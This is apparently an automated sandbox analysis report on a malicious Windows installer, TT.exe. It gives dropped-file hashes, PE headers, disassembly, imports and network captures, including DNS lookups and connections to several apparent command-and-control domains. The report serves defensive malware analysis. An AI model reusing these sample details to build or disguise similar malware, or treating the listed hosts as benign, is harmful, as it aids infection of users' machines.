                                              Preview: ..].u-......$.-.G...sZ.H....2..c..y.YW....r%Z....&_..Q.HYy......<^.0O.......Vw.WwO|..C....r...f...%.v.../x<.z..%....yX.Dbh..X.Jk..wL....."..k.+#...B..fj:"..v.p...s.A ?..Q...&..0.<........7+Ix....%......%B.O....^Ih.qLiMY...<...d~..0..(.N..#.....F.d...""..#.?...8.I.....sk..p.....xl...q...h..]](.T...s.W<.0e.h.@.K.k.*.:t.g..*E.2U.[..B..lM.]iu6N.x...0...x...7...=i..[...s.9..E....F.\}...^..#.0.9>.......t..\T,...h.....i.kJ-.R....OTua%@._..z..$n..q.=.....z.r...>.....<.....zj7.O....`./..._...ot...z[.b{.....Ab...lM.xRC$.DT..JL.?W.u9......5......*.........0...:.....-Z.iM...z.c...2..x8W..*cB....\.zq.;....;.......{k.m.nO.~.d."j.6g.}..uu...,..X8..`.L.q)..]'_~.K!I&.Q!y....+..Z..=H.7.&T<[z.ejT.....r....Ih..4.>.@.b.lh.Z.v"]..%.W.t.*.@./.f...DL9..7V.fC...#y.........`...Z$..YMV...G..Y.9...,....7C...>!#.....".3_.9V.v..%....5'zKp.......z...nX.w..\;.aO.....1Nn<Hz.....~y ~.i."..H.\}..x$U.$.......vW/..ctR.@?.U.h%h.....i+..{x....]...Q.n|..{z."mq.%.P.x...&..pC.=...
                                              C:\Users\user\AppData\Local\Temp\fcd80q5almvhl9patzxy
                                              Process:C:\Users\user\Desktop\TT.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):185856
                                              Entropy (8bit):7.9991875975833
                                              Encrypted:true
                                              SSDEEP:3072:CK9gUhvV+Vq661sHb3+/T951XpBBxDnoVWmg3Sqa8w2pq5iYvTID4qvcRP:v1hvV+EuHbE551ZBXDn5mg3SS48DT0P
                                              MD5:CD814429874D77D4228FC5B1614F78B8
                                              SHA1:319F2CDE578488373E81CC90D83C03DFB3869B62
                                              SHA-256:DF65396F209C8E9B4A9C3641E12C86512F36D61C72D132A22B9FD402D0B96454
                                              SHA-512:7A08BB5DB2FD88C0E86CA549C2227DE3D4AD9726EA9562ED46B70A74F29A124679D36B4C2BB4DF203994DA1F80F67A6FD908FF27CB7FAE68F8111803DC27657F
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..u..S~.....sl.x8..R.....@c.......p_...p... 8.mc..G..l..@.a.6......zt|X...c.....!..Y..c..|..`..L.5..H.2.."y.[-2..C'.*.!..{......l%h..N......3.i.....~.-.f.Y.....?#....yn.=.G"..?.%..c.)7C5..A....~WS:.}+.6.......#.P.qt.....t..a....Z.?f.L.....4.V....c6..R......A......mF....7....Sh"SL<...R....D..pi.Ao..Ct.....9...../R.F...u:.......`N.{..H...Y.....g.10"-.y.]vt.....:....ic.].....`..7,..>.......j...8......".....y.......E.Y.....l.A.-...?..d.Qf..(..3..zO.Qf.R..A...a..'.k.(..4......tc.D&.&..!x.9.}SA9h..y|.f..x..W9..y.oo.0|.Y......`...{.B+W..:`.s...D.^..;...f.q.2...l..@...Z .A..5....9.`....2..&..%.,US2......oy.i4.jT.7.qS7..nQ.0.....3..%........Zb.H.......mEiG.=.V.9,*kI..u.r...h.SV^.i(..=.Z.d$*.%\.k.qx2...t..C.X.(R......`....#K..=s.~...lxE..)..o..\ 3..."7.Eb...*.(.^s(...v.|P...I.....-.......f...J.si.v.V.w.}XG0#.3[.*....6.G....P..].k.G..aZ..R....!...lM.2.`z.7nJU..~.`....=..=.B......"... ...1&....F.../....*d.....8._<...3=.D/5....a.(.bI..;k6.H.....1.K..N.>"
                                              C:\Users\user\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dll
                                              Process:C:\Users\user\Desktop\TT.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):4.259466324255951
                                              Encrypted:false
                                              SSDEEP:96:BSEn1ASkfNDZ+tCEYB0IvlPxul4jdkpN3U:BSrX7JpEajdkpN3
                                              MD5:8BB43D922F43F1EFF660149AE2561939
                                              SHA1:AA781D53BF123D1DEAD8C960EEBB1079412B36F1
                                              SHA-256:E61D2234DE5A9841B5685B5FF23A2BAA6D56F564CDAFBA16709327ADB642C2D1
                                              SHA-512:76DBF56E555404296B185DE8B512DD287CB791B0BBDD2882DD2A86DBEED28551EE57E7B699FC0B5133171A4B47155CCE6AFB7C02C908578E130856092955E96B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 9%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.}XX..XX..XX...0./]X....,.UX..XX..xX...1./YX...1./YX...1./YX..RichXX..........PE..L......`...........!......................... ...............................@......................................p!..P...."....................................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...L....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\nsj2C12.tmp
                                              Process:C:\Users\user\Desktop\TT.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):200878
                                              Entropy (8bit):7.953929630191505
                                              Encrypted:false
                                              SSDEEP:6144:GkO1hvV+EuHbE551ZBXDn5mg3SS48DT0:AbZGbeTn55T
                                              MD5:B3F76B4476659ABABAFB2F9E8F5BC0A5
                                              SHA1:6BDC8E0CC5A7503048F5700D7A771E85EF7C732B
                                              SHA-256:B96AA6E0B6B3A074084C2901C633CD5D150EC1DB6A00DC50A7C9B98E76DB12CF
                                              SHA-512:23146C5150D1D0F04CD0AF31FC653650F7FE851F0BF464075837640A97C468016F800A1F0A822C04683ABD14C61186DD12AD0F7DCAD3FD9446EF76D01458109C
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........,...................................................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.895457089286785
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:TT.exe
                                              File size:233940
                                              MD5:27c863c479b0542b3bad21a67ad1406d
                                              SHA1:791e1d123c275ac4451c5550635c0a67eb4398a6
                                              SHA256:2a7a9c6d4505766ddf0a6c7dde9c2ae52369408fbe5ce93d0d3d76bf992b28dd
                                              SHA512:9b66354f49ade9d600e741cb2e626796830260745b1cd7540d611dc19e8576cacad95a9e03614ba36149df440cbe1efb7de5e73b4fce3a4ab7d60c42451b04da
                                              SSDEEP:6144:lPXZu0jlSr+Op4w+ZTXu4kVZxnnghYuLj+GblVMD/TLrZp:TDjIp49ZTqhsYuLqCSL/n
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x403461
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000184h
                                              push ebx
                                              push esi
                                              push edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 0040A130h
                                              mov dword ptr [esp+20h], ebx
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [004080B0h]
                                              call dword ptr [004080C0h]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [0042474Ch], eax
                                              je 00007FDE24E73463h
                                              push ebx
                                              call 00007FDE24E765DEh
                                              cmp eax, ebx
                                              je 00007FDE24E73459h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082A0h
                                              push esi
                                              call 00007FDE24E7655Ah
                                              push esi
                                              call dword ptr [004080B8h]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], bl
                                              jne 00007FDE24E7343Dh
                                              push 0000000Bh
                                              call 00007FDE24E765B2h
                                              push 00000009h
                                              call 00007FDE24E765ABh
                                              push 00000007h
                                              mov dword ptr [00424744h], eax
                                              call 00007FDE24E7659Fh
                                              cmp eax, ebx
                                              je 00007FDE24E73461h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007FDE24E73459h
                                              or byte ptr [0042474Fh], 00000040h
                                              push ebp
                                              call dword ptr [00408038h]
                                              push ebx
                                              call dword ptr [00408288h]
                                              mov dword ptr [00424818h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+38h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0041FD10h
                                              call dword ptr [0040816Ch]
                                              push 0040A1ECh

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xa50.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x2d0000xa500xc00False0.402994791667data4.1909607241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x2d1900x2e8dataEnglishUnited States
                                              RT_DIALOG0x2d4780x100dataEnglishUnited States
                                              RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                              RT_DIALOG0x2d6980x60dataEnglishUnited States
                                              RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                              RT_MANIFEST0x2d7100x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/04/21-15:41:42.977363ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:43.014361ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                              05/04/21-15:41:43.015936ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:43.052119ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                              05/04/21-15:41:43.053773ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:43.092112ICMP449ICMP Time-To-Live Exceeded in Transit91.206.52.152192.168.2.6
                                              05/04/21-15:41:43.095066ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:46.656561ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:50.660407ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:54.656546ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:41:58.657044ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:02.663919ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:06.658201ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:10.658652ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:14.660420ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:18.705109ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:22.659447ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:26.659303ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:30.660211ICMP384ICMP PING192.168.2.613.107.4.50
                                              05/04/21-15:42:30.696138ICMP408ICMP Echo Reply13.107.4.50192.168.2.6
                                              05/04/21-15:43:53.413305TCP1201ATTACK-RESPONSES 403 Forbidden804975034.98.99.30192.168.2.6

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2021 15:42:50.230664015 CEST4973580192.168.2.6192.0.78.24
                                              May 4, 2021 15:42:50.273006916 CEST8049735192.0.78.24192.168.2.6
                                              May 4, 2021 15:42:50.273149014 CEST4973580192.168.2.6192.0.78.24
                                              May 4, 2021 15:42:50.273303986 CEST4973580192.168.2.6192.0.78.24
                                              May 4, 2021 15:42:50.315745115 CEST8049735192.0.78.24192.168.2.6
                                              May 4, 2021 15:42:50.315778017 CEST8049735192.0.78.24192.168.2.6
                                              May 4, 2021 15:42:50.315784931 CEST8049735192.0.78.24192.168.2.6
                                              May 4, 2021 15:42:50.316112995 CEST4973580192.168.2.6192.0.78.24
                                              May 4, 2021 15:42:50.316195011 CEST4973580192.168.2.6192.0.78.24
                                              May 4, 2021 15:42:50.356570959 CEST8049735192.0.78.24192.168.2.6
                                              May 4, 2021 15:43:10.725258112 CEST4974180192.168.2.6107.165.149.13
                                              May 4, 2021 15:43:10.926847935 CEST8049741107.165.149.13192.168.2.6
                                              May 4, 2021 15:43:10.926980019 CEST4974180192.168.2.6107.165.149.13
                                              May 4, 2021 15:43:10.927222013 CEST4974180192.168.2.6107.165.149.13
                                              May 4, 2021 15:43:11.182739973 CEST8049741107.165.149.13192.168.2.6
                                              May 4, 2021 15:43:11.412791014 CEST4974180192.168.2.6107.165.149.13
                                              May 4, 2021 15:43:11.669020891 CEST8049741107.165.149.13192.168.2.6
                                              May 4, 2021 15:43:34.022903919 CEST4974980192.168.2.6107.180.41.236
                                              May 4, 2021 15:43:34.155426025 CEST8049749107.180.41.236192.168.2.6
                                              May 4, 2021 15:43:34.155611992 CEST4974980192.168.2.6107.180.41.236
                                              May 4, 2021 15:43:34.155756950 CEST4974980192.168.2.6107.180.41.236
                                              May 4, 2021 15:43:34.290843964 CEST8049749107.180.41.236192.168.2.6
                                              May 4, 2021 15:43:34.301795006 CEST8049749107.180.41.236192.168.2.6
                                              May 4, 2021 15:43:34.301826954 CEST8049749107.180.41.236192.168.2.6
                                              May 4, 2021 15:43:34.302002907 CEST4974980192.168.2.6107.180.41.236
                                              May 4, 2021 15:43:34.302054882 CEST4974980192.168.2.6107.180.41.236
                                              May 4, 2021 15:43:34.434403896 CEST8049749107.180.41.236192.168.2.6

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2021 15:41:36.144141912 CEST53492838.8.8.8192.168.2.6
                                              May 4, 2021 15:41:36.154351950 CEST53583778.8.8.8192.168.2.6
                                              May 4, 2021 15:41:37.403296947 CEST5507453192.168.2.68.8.8.8
                                              May 4, 2021 15:41:37.453011990 CEST53550748.8.8.8192.168.2.6
                                              May 4, 2021 15:41:38.183526993 CEST5451353192.168.2.68.8.8.8
                                              May 4, 2021 15:41:38.234077930 CEST53545138.8.8.8192.168.2.6
                                              May 4, 2021 15:41:38.975087881 CEST6204453192.168.2.68.8.8.8
                                              May 4, 2021 15:41:39.023847103 CEST53620448.8.8.8192.168.2.6
                                              May 4, 2021 15:41:39.787544012 CEST6379153192.168.2.68.8.8.8
                                              May 4, 2021 15:41:39.838179111 CEST53637918.8.8.8192.168.2.6
                                              May 4, 2021 15:41:39.877981901 CEST6426753192.168.2.68.8.8.8
                                              May 4, 2021 15:41:39.937056065 CEST53642678.8.8.8192.168.2.6
                                              May 4, 2021 15:41:40.619221926 CEST4944853192.168.2.68.8.8.8
                                              May 4, 2021 15:41:40.667752028 CEST53494488.8.8.8192.168.2.6
                                              May 4, 2021 15:41:42.016491890 CEST6034253192.168.2.68.8.8.8
                                              May 4, 2021 15:41:42.070719004 CEST53603428.8.8.8192.168.2.6
                                              May 4, 2021 15:41:42.908386946 CEST6134653192.168.2.68.8.8.8
                                              May 4, 2021 15:41:42.963763952 CEST5177453192.168.2.68.8.8.8
                                              May 4, 2021 15:41:42.976145983 CEST53613468.8.8.8192.168.2.6
                                              May 4, 2021 15:41:43.014395952 CEST53517748.8.8.8192.168.2.6
                                              May 4, 2021 15:41:43.920546055 CEST5602353192.168.2.68.8.8.8
                                              May 4, 2021 15:41:43.969271898 CEST53560238.8.8.8192.168.2.6
                                              May 4, 2021 15:41:44.781716108 CEST5838453192.168.2.68.8.8.8
                                              May 4, 2021 15:41:44.833266973 CEST53583848.8.8.8192.168.2.6
                                              May 4, 2021 15:41:45.841543913 CEST6026153192.168.2.68.8.8.8
                                              May 4, 2021 15:41:45.893538952 CEST53602618.8.8.8192.168.2.6
                                              May 4, 2021 15:41:50.925205946 CEST5606153192.168.2.68.8.8.8
                                              May 4, 2021 15:41:50.973963976 CEST53560618.8.8.8192.168.2.6
                                              May 4, 2021 15:41:51.722230911 CEST5833653192.168.2.68.8.8.8
                                              May 4, 2021 15:41:51.773081064 CEST53583368.8.8.8192.168.2.6
                                              May 4, 2021 15:41:52.557533026 CEST5378153192.168.2.68.8.8.8
                                              May 4, 2021 15:41:52.606292009 CEST53537818.8.8.8192.168.2.6
                                              May 4, 2021 15:41:53.388611078 CEST5406453192.168.2.68.8.8.8
                                              May 4, 2021 15:41:53.437273026 CEST53540648.8.8.8192.168.2.6
                                              May 4, 2021 15:41:54.189666986 CEST5281153192.168.2.68.8.8.8
                                              May 4, 2021 15:41:54.249763966 CEST53528118.8.8.8192.168.2.6
                                              May 4, 2021 15:41:56.150414944 CEST5529953192.168.2.68.8.8.8
                                              May 4, 2021 15:41:56.205647945 CEST53552998.8.8.8192.168.2.6
                                              May 4, 2021 15:41:57.167248011 CEST6374553192.168.2.68.8.8.8
                                              May 4, 2021 15:41:57.216856956 CEST53637458.8.8.8192.168.2.6
                                              May 4, 2021 15:41:57.950267076 CEST5005553192.168.2.68.8.8.8
                                              May 4, 2021 15:41:57.999723911 CEST53500558.8.8.8192.168.2.6
                                              May 4, 2021 15:42:13.421814919 CEST6137453192.168.2.68.8.8.8
                                              May 4, 2021 15:42:13.470455885 CEST53613748.8.8.8192.168.2.6
                                              May 4, 2021 15:42:17.391310930 CEST5033953192.168.2.68.8.8.8
                                              May 4, 2021 15:42:17.458028078 CEST53503398.8.8.8192.168.2.6
                                              May 4, 2021 15:42:32.362274885 CEST6330753192.168.2.68.8.8.8
                                              May 4, 2021 15:42:32.421595097 CEST53633078.8.8.8192.168.2.6
                                              May 4, 2021 15:42:34.557418108 CEST4969453192.168.2.68.8.8.8
                                              May 4, 2021 15:42:34.606385946 CEST53496948.8.8.8192.168.2.6
                                              May 4, 2021 15:42:40.547815084 CEST5498253192.168.2.68.8.8.8
                                              May 4, 2021 15:42:40.821396112 CEST53549828.8.8.8192.168.2.6
                                              May 4, 2021 15:42:41.585339069 CEST5001053192.168.2.68.8.8.8
                                              May 4, 2021 15:42:41.679277897 CEST53500108.8.8.8192.168.2.6
                                              May 4, 2021 15:42:42.254551888 CEST6371853192.168.2.68.8.8.8
                                              May 4, 2021 15:42:42.312946081 CEST53637188.8.8.8192.168.2.6
                                              May 4, 2021 15:42:43.001288891 CEST6211653192.168.2.68.8.8.8
                                              May 4, 2021 15:42:43.061049938 CEST53621168.8.8.8192.168.2.6
                                              May 4, 2021 15:42:43.135248899 CEST6381653192.168.2.68.8.8.8
                                              May 4, 2021 15:42:43.208237886 CEST53638168.8.8.8192.168.2.6
                                              May 4, 2021 15:42:43.626993895 CEST5501453192.168.2.68.8.8.8
                                              May 4, 2021 15:42:43.773308992 CEST53550148.8.8.8192.168.2.6
                                              May 4, 2021 15:42:44.393929005 CEST6220853192.168.2.68.8.8.8
                                              May 4, 2021 15:42:44.456362963 CEST53622088.8.8.8192.168.2.6
                                              May 4, 2021 15:42:44.964993954 CEST5757453192.168.2.68.8.8.8
                                              May 4, 2021 15:42:45.022119999 CEST53575748.8.8.8192.168.2.6
                                              May 4, 2021 15:42:46.039253950 CEST5181853192.168.2.68.8.8.8
                                              May 4, 2021 15:42:46.087892056 CEST53518188.8.8.8192.168.2.6
                                              May 4, 2021 15:42:46.944619894 CEST5662853192.168.2.68.8.8.8
                                              May 4, 2021 15:42:47.010560036 CEST53566288.8.8.8192.168.2.6
                                              May 4, 2021 15:42:47.598464012 CEST6077853192.168.2.68.8.8.8
                                              May 4, 2021 15:42:47.649784088 CEST53607788.8.8.8192.168.2.6
                                              May 4, 2021 15:42:50.158595085 CEST5379953192.168.2.68.8.8.8
                                              May 4, 2021 15:42:50.224337101 CEST53537998.8.8.8192.168.2.6
                                              May 4, 2021 15:42:51.498380899 CEST5468353192.168.2.68.8.8.8
                                              May 4, 2021 15:42:51.564037085 CEST53546838.8.8.8192.168.2.6
                                              May 4, 2021 15:43:10.514071941 CEST5932953192.168.2.68.8.8.8
                                              May 4, 2021 15:43:10.723694086 CEST53593298.8.8.8192.168.2.6
                                              May 4, 2021 15:43:16.073816061 CEST6402153192.168.2.68.8.8.8
                                              May 4, 2021 15:43:16.134013891 CEST53640218.8.8.8192.168.2.6
                                              May 4, 2021 15:43:20.654659986 CEST6508453192.168.2.68.8.8.8
                                              May 4, 2021 15:43:20.655381918 CEST5275153192.168.2.68.8.8.8
                                              May 4, 2021 15:43:20.703342915 CEST53650848.8.8.8192.168.2.6
                                              May 4, 2021 15:43:20.712234020 CEST53527518.8.8.8192.168.2.6
                                              May 4, 2021 15:43:20.714982986 CEST5028653192.168.2.68.8.8.8
                                              May 4, 2021 15:43:20.778337002 CEST53502868.8.8.8192.168.2.6
                                              May 4, 2021 15:43:22.157166004 CEST5612953192.168.2.68.8.8.8
                                              May 4, 2021 15:43:22.230182886 CEST53561298.8.8.8192.168.2.6
                                              May 4, 2021 15:43:24.101075888 CEST5817753192.168.2.68.8.8.8
                                              May 4, 2021 15:43:24.166117907 CEST53581778.8.8.8192.168.2.6
                                              May 4, 2021 15:43:33.962656021 CEST5070053192.168.2.68.8.8.8
                                              May 4, 2021 15:43:34.021742105 CEST53507008.8.8.8192.168.2.6
                                              May 4, 2021 15:43:53.159787893 CEST5406953192.168.2.68.8.8.8
                                              May 4, 2021 15:43:53.231976032 CEST53540698.8.8.8192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 4, 2021 15:42:50.158595085 CEST192.168.2.68.8.8.80xd9d3Standard query (0)www.philreid4cc.comA (IP address)IN (0x0001)
                                              May 4, 2021 15:43:10.514071941 CEST192.168.2.68.8.8.80xf2afStandard query (0)www.sectorulb.comA (IP address)IN (0x0001)
                                              May 4, 2021 15:43:33.962656021 CEST192.168.2.68.8.8.80xd76aStandard query (0)www.lagrangewildliferemoval.comA (IP address)IN (0x0001)
                                              May 4, 2021 15:43:53.159787893 CEST192.168.2.68.8.8.80x545fStandard query (0)www.umlausa.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 4, 2021 15:42:50.224337101 CEST8.8.8.8192.168.2.60xd9d3No error (0)www.philreid4cc.comphilreid4cc.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 15:42:50.224337101 CEST8.8.8.8192.168.2.60xd9d3No error (0)philreid4cc.com192.0.78.24A (IP address)IN (0x0001)
                                              May 4, 2021 15:42:50.224337101 CEST8.8.8.8192.168.2.60xd9d3No error (0)philreid4cc.com192.0.78.25A (IP address)IN (0x0001)
                                              May 4, 2021 15:43:10.723694086 CEST8.8.8.8192.168.2.60xf2afNo error (0)www.sectorulb.com107.165.149.13A (IP address)IN (0x0001)
                                              May 4, 2021 15:43:34.021742105 CEST8.8.8.8192.168.2.60xd76aNo error (0)www.lagrangewildliferemoval.comlagrangewildliferemoval.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 15:43:34.021742105 CEST8.8.8.8192.168.2.60xd76aNo error (0)lagrangewildliferemoval.com107.180.41.236A (IP address)IN (0x0001)
                                              May 4, 2021 15:43:53.231976032 CEST8.8.8.8192.168.2.60x545fNo error (0)www.umlausa.comumlausa.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 15:43:53.231976032 CEST8.8.8.8192.168.2.60x545fNo error (0)umlausa.com34.98.99.30A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.philreid4cc.com
                                              • www.sectorulb.com
                                              • www.lagrangewildliferemoval.com

                                              HTTP Packets

